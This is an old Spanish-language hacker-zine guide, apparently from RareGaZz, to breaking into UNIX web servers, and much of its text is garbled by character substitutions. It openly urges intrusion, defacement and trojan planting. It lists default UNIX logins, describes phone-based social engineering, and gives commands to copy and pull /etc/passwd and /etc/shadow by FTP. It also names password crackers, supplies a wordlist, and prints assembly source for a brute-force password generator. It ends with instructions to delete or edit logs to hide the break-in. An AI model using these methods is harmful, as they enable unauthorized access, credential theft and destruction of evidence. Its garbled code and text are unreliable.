"Guia para crackear Websites & Homepages"

por Le PomPaItor
"Lo espantoso no es la altura, sino la pendiente. La pendiente donde la mirada se precipita a lo hondo y la mano se extiende hacia la
cumbre. Alli es donde se apodera del corazon el vertigo de su doble voluntad." -Federico Nietzsche
1. Introduccion
Si alguna vez has hechado a volar tu imaginacion se te habra ocurrido ue seria comico remover algunas gra!icas de algun "ebsite, o
me#or aun borrar toda la pagina de algun enemigo para deleitarte con tu venganza. $ues bien, este es el manual ue te ayudara a lograrlo.
$rimero deberas entender ue andar por ahi borrando paginas es %&'N&'% e inmaduro. Lo ue trato de hacer es ue sientas la adrenalina
de entrar a un sistema al ue no estes autorizado y echar una o#eada alrededor. Si te dedicas a invadir sistemas y borrar archivos le
uitaras el privilegio a otra persona de entrar a ese sistema ya ue el operador se dara cuenta de la intrusion y aumentaran la seguridad
negando asi la entrada a mas (intrusos(. Si el sistema al ue entraste pertenece a unos hi#os de la chingada )$lantas Nucleares, *readores
de abrigos de piel, Agencias de +obierno,etc, olvida lo antes dicho y haz ue se arrepientan de haberse conectado a la red causando -aos
o me#or aun, in!ectandolos con algun buen virus )por ue no reemplazar un e#ecutable por un caballo de troya.,. /n !in, usa tu cabeza y
cuida de no ser sorprendido en tus via#es de -AoS.
2. Websites
0n "ebsite es solamente una computadora llamada servidor por su capacidad de de realizar di!erentes tareas al mismo tiempo, e#ecutando
un sistema operativo ue generalmente sera 0N12 o algunas de sus variaciones y con toda la in!ormacion guardada en algun medio.
3.4 +anando acceso a un servidor 555
Aui reside la magia del 6ac-er, la proteccion comun son dos preguntas Login y $ass"ord. /l usuario ue tenga una cuenta en ese
servidor tiene un nombre de usuario )Login, y contrase7a )$ass"ord, por lo ue la entrada a ese servidor no tiene problemas8 pero para
una persona a#ena a ese servidor la entrada es un poco mas complicada.
$ara poder penetrar el sistema necesitamos saber su 09L y una vez conectados con el explorador prestar atencion al mensa#e "aiting
reply !rom 4:;.;<.3< o algo parecido ue haga aparecer una direccion 1$ en lugar de el nombre de dominio.
Si lograste conseguir la direccion 1$ usa telnet para conectarte a esa direccion. Si cuando tratas de conectarte aparece el mensa#e
(connection re!used( probablemente este protegida esa direccion con una F19/5ALL. Si este es el caso trata de hacer telnet a el nombre
de dominio con la !inalidad de llegar a el !rustrante L'+1N=$ASS5'9>.
$ara entrar necesitas conseguir alguna cuenta haciendo algo de ingenieria social o intenta con los de!aults.
% *0/N&AS >/FA0L&S >/ 0N12 %
Login? $ass"ord?
root root
root system
sys sys
sys system
daemon daemon
uucp uucp
tty tty
test test
unix unix
unix test
bin bin
adm adm
adm admin
admin adm
admin admin
sysman sysman
sysman sys
sysman system
sysadmin sysadmin
sysadmin sys
sysadmin system
sysadmin admin
sysadmin adm
"ho "ho
learn learn
uuhost uuhost
guest guest
host host
nuucp nuucp
4
r#e r#e
games games
games player
sysop sysop
root sysop
demo demo
Si !racasas al intentar el acceso usando cada uno de los anteriores logins, probablemente tengas ue conseguir el pass"ord de otra manera
como relaciones humanas8 esto signi!ica ue vas a tener ue conseguir la clave valiendote de trucos como hablar por tele!ono a una
persona ue sepas ue esta registrada en ese servidor y pedirle su Login y $ass"ord diciendo ue necesitas validar su cuenta o algo
parecido. 'tra manera de conseguir un $ass"ord es crear un programa ue robe las claves de acceso del disco duro de una persona.
;. *uando se esta adentro
0na vez ue hayas logrado entrar a un sistema necesitaras localizar y obtener el archivo pass"d disponible en el directorio =etc
$ara obtener el archivo $ASS5> usa el siguiente e#emplo?
)@ simboliza el prompt 0N12,
@ !tp
F&$A get =etc=pass"d
F&$A uit
$ara ver el contenido de el archivo usa el siguiente comando?
@ cat =etc=pass"d
0na vez ue tengas en tu posesion el archivo $ASS5> editalo y !i#ate en su contenido, debera tener la siguiente in!ormacion?
usuario?contrase7a?1>?+rupo?descripcion=nombre?directorio?shell
usuario - /ste es el login de algun usuario.
contrase7a - /s el pass"ord de el usuario )encriptada con >/S,
1> - /s la identi!icacion de ese usuario.
grupo - /l grupo al ue pertenece esta cuenta.
descripcion- /l nombre del usuario.
directorio - /l directorio de acceso de el usuario.
shell - /l shell ue procesa los comandos de ese usuario.
0n e#emplo podria ser?
#ohn?3;BabcCD?EEEE?4;?Fohn Fohnson?=home=dir=#ohn?=bin=#ohn
Nombre de usuario? #ohn
$ass"ord encriptado? 3;BabcCD
0suario numero? EEEE
Numero de grupo? 4;
>escripcion? Fohn Fohnson
>irectorio de acceso? =home=dir=#ohn
Shell? =bin=#ohn
Si el archivo ue conseguiste contiene la misma in!ormacion pero en el campo del pass"ord tiene un asterisco )%, o cualuier otro
caracter, signi!ica ue las contrase7as se encuentran (sombreadas(.
Si las contraseGas se encuentra sombreada,las podras encontrar en el archivo shado" aunue generalmente no se puede tener acceso a ese
archivo a menos de tener root. 0na !orma de conseguir S6A>'5 es usando el comando cp para copiarlo a otro archivo y despues tratar
de obtener el archivo al ue se copio, e#emplo?
@cp =etc=shado" =usuarios=carlos=hac-.txt
@!tp
F&$A get =usuarios=carlos=hac-.txt
F&$A uit
@rd =usuarios=carlos=hac-.txt
Algunas otras maneras de obtener el archivo S6A>'5 seran explicadas en otros numeros de 9are+aHz.
Ia tengo los pass"ords encriptados, ahora ue.
Los pass"ords estan encriptados usando one-"ay encription, signi!ica ue no se pueden des-encriptar. Lo ue 0nix hace es obtener la
contraseGa del usuario,la encripta y la compara con la ue ya esta encriptada, si coinciden entonces se le permite el acceso.
$ara poder obtener las contraseGas es necesario tener un archivo con palabras y usar un programa para ue encripte las palabras del
archivo y las compare con las contrase7as encriptadas,si coinciden te avisa ue palabra !ue la ue coincidio con la contrase7a encriptada.
Algunos programas de este tipo son?
Nombre $alabras por Segundo *omputadora
Fohn the 9ipper C:JJ C<D
Starcrac-er 4;:: C<D
3
*rac-er Fac- 4::< C<D
Killer*rac-er ;C: C<D
/stos programas se encuentran disponibles en cualuier pagina de 6ac-ers, si uieres la ultima version de Star*rac-er visita la siguiente
09L? http?==""".geocities.com=SiliconLalley=par-=<B:;=index.html
$ara conseguir listas de palabras haz F&$ a el siguiente servidor?
"ar"ic-.ac.u-
directorio? =pub=cud
Algunas de las palabras mas usadas en contraseGas son?
aaa academia ada adrian
aerobics airplane albany albatros
albert alex alexander algebra
alias alisa alpha alphabet
ama amy analog anchor
andy andrea animal ans"er
anything arro" arthur ass
asshole athena atmosphere bacchus
badass bailey banana bandit
ban-s bass batman beauti!ul
beauty beaver daniel danny
dave deb debbie deborah
december desire desperate develop
diet digital discovery disney
dog drought duncan easy
eatme edges ed"in egghead
eileen einstein elephant elizabeth
ellen emerald engine engineer
enterprise enzyme euclid evelyn
extension !air"ay !elicia !ender
!inite !ormat god hello
idiot #ester #ohn #ohnny
#oseph #oshua #udith #uggle
#ulia -athleen -ermit -ernel
-night lambda larry lazarus
lee leroy le"is light
lisa louis love lynne
mac macintosh mac- maggot
martin marty marvin matt
master maurice maximum merlin
mets michael michelle mi-e
minimum nic-i nicole rascal
really rebecca remote ric-
reagan robot robotics rolex
ronald rose rosebud rosemary
roses ruben rules ruth
sal saxon scheme scott
secret sensor serenity sex
shar- sharon shit shiva
shuttle simon simple singer
single singing smile smooch
smother snatch snoopy soap
socrates spit spring sub"ay
success summer super support
sur!er suzanne tangerine tape
target taylor telephone temptation
tiger tigger toggle tomato
toyota trivial unhappy unicorn
un-no"n urchin utility vic-i
virginia "arren "ater "eenie
"hatnot "hitney "ill virgin
;
"illiam "inston "illie "izard
"onbat yosemite zap "hatno"
'btuve algunas cuentas, ahora.
$ara poder hacer y deshacer en el servidor necesitas el pass"ord de la cuenta root. Si despues de intentar con algunas listas de palabras no
puedes necesitaras hacer un ataue en bruto, es decir empezar desde la letra A hasta la palabra zzzzzzzz
/l siguiente programa necesita ser compilado usando &ASM y es una lista de palabras &S9 ue no ocupa espacio en disco y puede ser
modi!icada, es ideal para ataues brutos a la cuenta r::tN )$rograma *opiado de $hrac- BJ,
$ A S S 5 ' 9 > / N + 1 N / )!or 1OM $*(s, by 0ncle Armpit
PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP
Que tan practico es.
/ste programa no necesita mucho espacio en disco y puede crear listas de palabras de gran tama7o.
*on el e#emplo proporcionado, pass"ords empezando en (aaaaaaa( y terminando en (zzzzzzz( seran generados.
*omo empiezo a usar esta lista de palabras.
*ompila el codigo y nombralo "hac-drv.sys", despues necesitas con!igurarlo aGadiendo la siguiente linea en *'NF1+.SIS
deviceRc?Shac-drv.sys
0na vez en memoria el programa creara la lista de variables en memoria llamada 6A*K$5>. *ualuier programa ue uses )excepto
Star*rac-er, debera reconocer hac-p"d como una lista de palabras y empezar a crac-ear.
Si deseas reiniciar una sesion desde una combinacion especi!ica solo modi!ica el archivo 6A*K>9L.SIS con un editor
6/2A>/*1MAL y modi!ica la cadena de caracteres con los ue empieza 8-:
8-----------------------cut here--------------------------------
8$rogram 6A*K>9L.SIS
8
org :h
nextNdev dd -4
attribute d" :c:::h 8character device "= ioctl calls
strategy d" devNstrategy
interrupt d" devNint
devNname db (6A*K$5> (
countr d" o!!set number
number db (aaaaaa(,:ah 8T---- D caracteres en minusculas )empiezo,
numsize eu @-number - 3
a!ternum?
8"or-ing space !or device driver
rhNo!s d" .
rhNseg d" .
devNstrategy? 8strategy routine
mov cs?rhNseg,es
mov cs?rhNo!s,bx
ret!
devNint? 8interrupt routine
push!
push ds
push es
push ax
push bx
push cx
push dx
push di
push si
cld
push cs
pop ds
mov bx,cs?rhNseg
mov es,bx
mov bx,cs?rhNo!s
mov al,es?UbxVP3
rol al,4
mov di,o!!set cmdtab
xor ah,ah
add di,ax
#mp "ord ptrUdiV
B
cmdtab? 8command table
d" init 8:
d" exit; 84
d" exit; 83
d" ioctlNread 8;
d" doNread 8B
d" exit; 8C
d" exit; 8D
d" exit; 8J
d" exit; 8<
d" exit; 8E
d" exit; 84:
d" exit; 844
d" ioctlN"rite 843
d" exit; 84;
d" C dup )o!!set exit;,
ioctlNread?
push es
push bx
mov si,es?UbxP4:hV
mov di,es?UbxP:ehV
mov es,si
push cs
pop ds
mov si,o!!set number
xor cx,cx
getNchar?
lodsb
stosb
inc cl
cmp al,:ah
#z ioctlNrend
#mp getNchar
ioctlNrend?
pop bx
pop es
mov es?UbxP:43hV,cx
mov cs?countr,o!!set number
#mp exit3
ioctlN"rite?
push es
push bx
mov si,es?UbxP:4:hV
mov ds,si
mov si,es?UbxP:ehV
mov cx,numsizeP4 8es?UbxP:43hV
push cs
pop es
mov di,o!!set number
repe movsb
pop es
pop bx
mov cs?countr,o!!set number
#mp exit3
doNread?
push es
push bx
push cs
pop ds
C
mov si,UcountrV
inc si 8"ord ptr UcountrV
cmp si,o!!set a!ternum
#nz isNo-ay
mov si,o!!set number
call incNnum
isNo-ay?
mov UcountrV,si
mov di,es?UbxVP:eh
mov ax,es?UbxVP:4:h
mov cx, es?UbxVP:43h
#cxz cleanNup
mov es,ax
repe movsb
cleanNup?
pop bx
pop es
#mp exit3
exit;? mov es?"ord ptr ;UbxV,:<4:;h
#mp exit4
exit3?
mov es?"ord ptr ;UbxV,:4::h
exit4?
pop si
pop di
pop dx
pop cx
pop bx
pop ax
pop es
pop ds
pop!
ret!
exit?
incNnum proc near
push si
mov si,numsize
reiterate?
inc byte ptr UnumberPsiV
cmp byte ptr UnumberPsiV,(z(P4 8P4 past ending char. in range
#nz Nexit
mov byte ptr UnumberPsiV,(a( 8starting char. in range
dec si
cmp si,-4
#nz reiterate
mov byte ptr UnumberV,:4ah 8send /'F
Nexit?
pop si
ret
incNnum endp
atNeo!? 8 the non-resident code starts here
initial proc near
push es
push cs
pop ds
push cs
pop es
mov si,o!!set number
mov di,o!!set tmpnum
cld
D
Nagain?
lodsb
cmp al,:ah
#z Nnomorechars
stosb
#mp Nagain
Nnomorechars?
mov si,o!!set msgend
mov cx,B
repe movsb
mov ah,:E 8print "elcome message
mov dx,o!!set msg4
int 34h
pop es
ret
initial endp
init? call initial
mov ax,o!!set atNeo!
mov es?UbxVP:eh,ax
push cs
pop ax
mov es?UbxVP:4:h,ax
mov cs?"ord ptr cmdtab,o!!set exit;
#mp exit3
msg4 db "1ncremental $ass"ord +enerator )c,4EEC",:ah,:dh
db "5ritten by 0ncle Armpit",:ah,:dh,:ah,:dh
db "Starting at "ord U"
tmpnum db 4: dup ).,
msgend db "V",:a,:d,(@(
8/N> hac-drv.sys
----------------------------------cut here----------------------------------
*omo limpiar tus huellas
Si deseas ue tu ingreso con la cuenta r::t no uede registrado en los L'+S de el servidor revisa los directorios buscando archivos como
logs, syslog, log, o cualuiera ue parezca ue guarda un reporte de los accesos y borralos o me#or aun editalos usando el editor de
archivos de 0N12. $ara e#ecutar el editor usa el comando vi
/dita o borra los siguientes archivos? =etc=syslog
=etc=log
=etc=logs
/xisten algunos scripts para borrar las huellas como HA$W disponibles en la red y en los proximos numeros de esta revista.
Le PompaItor
J